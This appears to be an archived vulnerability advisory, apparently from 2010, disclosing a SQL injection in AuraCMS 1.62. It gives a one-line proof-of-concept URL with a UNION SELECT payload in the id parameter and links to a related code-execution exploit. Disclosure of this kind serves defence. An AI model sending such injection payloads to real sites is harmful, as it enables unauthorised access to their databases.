AuraCMS SQL Injection

2010-11-22T00:00:00
ID PACKETSTORM:96035
Type packetstorm
Reporter Arianom
Modified 2010-11-22T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------  
AuraCMS (pfd.php) SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : Arianom (arianom@indonesiancoder.com)  
Homepage : http://indonesiancoder.com  
Vendor : http://www.auracms.org/  
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html  
Version : 1.62  
Date : November 22, 2010  
-----------------------------------------------------------------------  
  
  
  
I. POC & Exploit  
-----------------------------------------------------------------------  
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7  
  
II. Refrence  
-----------------------------------------------------------------------  
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/  
  
III. Vendor patch  
-----------------------------------------------------------------------  
Currently manufacturers do not provide patches or upgrades.  
  
IV. Credits  
-----------------------------------------------------------------------  
Allahu Akbar  
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew  
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_  
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader  
  
V. Poem  
-----------------------------------------------------------------------  
Kami adalah manusia biasa yang gemar belajar.  
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.  
Kami disini hanya ingin berbagi, bukan untuk bersaing.  
  
Indonesian Coder Family  
  
`